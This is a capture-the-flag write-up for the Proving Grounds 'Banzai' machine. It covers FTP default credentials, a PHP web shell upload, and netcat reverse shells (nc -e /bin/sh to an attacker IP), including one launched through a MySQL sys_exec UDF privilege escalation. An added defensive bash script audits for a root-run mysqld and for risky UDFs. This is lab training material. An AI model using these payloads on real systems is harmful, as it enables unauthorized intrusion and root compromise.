Banzai
Writeup for Pelican from offsec Proving Grounds
Information Gathering
sudo ./nmapAutomator.sh 192.168.141.56 all
Service Enumeration
HTTP (Port 8295)
Doesn't look like there's anything useful here.
SMTP (Port 25)
SMTP user enumeration.
We got the users in SMTP; however, they all need a password to be authenticated.
FTP (Port 21)
We try admin:admin and we are authenticated!
The files here look very similar to our gobuster result on the web app on port 8295, maybe we can add a PHP web shell and access it from port 8295.
Exploit
Let's upload our web shell onto the FTP server.
Let's navigate to our web shell and we have RCE!
Let's get our interactive shell.
Payload: nc -e /bin/sh 192.168.49.141 22
Privesc
Looks like MySQL is running as root, and there are credentials for it.
We can follow this trick to gain root.
Looks like lib_mysqludf_sys.so is missing from our target machine, so let's download it to our attack machine and transfer it to our target machine.
Let's check if our target machine is 32 or 64 bit.
Once we transfer the files, we can try getting a reverse shell.
Payload:
select sys_exec('nc -e /bin/sh 192.168.49.141 22');
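From the defender's side, the privesc above needs two things to be true: mysqld runs as root, and a UDF from lib_mysqludf_sys.so is registered in mysql.func. The script below is an added example, not part of the original writeup; it checks for both conditions, and the function names and sample inputs are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added defensive example: audit the two conditions the MySQL UDF privesc relies on.
# All sample data below is constructed; on a real host feed the functions from
#   ps -eo user,comm
#   mysql -N -B -e "SELECT name, dl FROM mysql.func"

# Constructed `ps -eo user,comm` output.
SAMPLE_PS='USER     COMMAND
root     sshd
root     mysqld
www-data apache2'

# Constructed tab-separated rows of mysql.func (name, dl).
SAMPLE_FUNC=$(printf 'sys_exec\tlib_mysqludf_sys.so\nmy_metric\tmetrics_udf.so\n')

# Reads ps output on stdin; reports every database daemon owned by root.
# Returns non-zero if at least one was found.
check_mysqld_user() {
  awk 'NR > 1 && ($2 == "mysqld" || $2 == "mariadbd") && $1 == "root" {
         print "FAIL: " $2 " runs as root"; bad = 1 }
       END { exit bad + 0 }'
}

# Reads mysql.func rows on stdin; reports UDFs from the lib_mysqludf_sys
# family, which hand OS command execution to whoever may call them.
check_udfs() {
  awk -F '\t' '$1 ~ /^sys_(exec|eval|get|set)$/ || $2 ~ /lib_mysqludf_sys/ {
         print "FAIL: UDF " $1 " loaded from " $2; bad = 1 }
       END { exit bad + 0 }'
}

# Runs both checks; $1 = ps output, $2 = mysql.func rows.
audit() {
  audit_rc=0
  printf '%s\n' "$1" | check_mysqld_user || audit_rc=1
  printf '%s\n' "$2" | check_udfs || audit_rc=1
  return $audit_rc
}

audit "$SAMPLE_PS" "$SAMPLE_FUNC" || echo "host needs hardening"
```

A finding from either check is fixed by running mysqld under its own unprivileged account and dropping the unexpected functions from mysql.func.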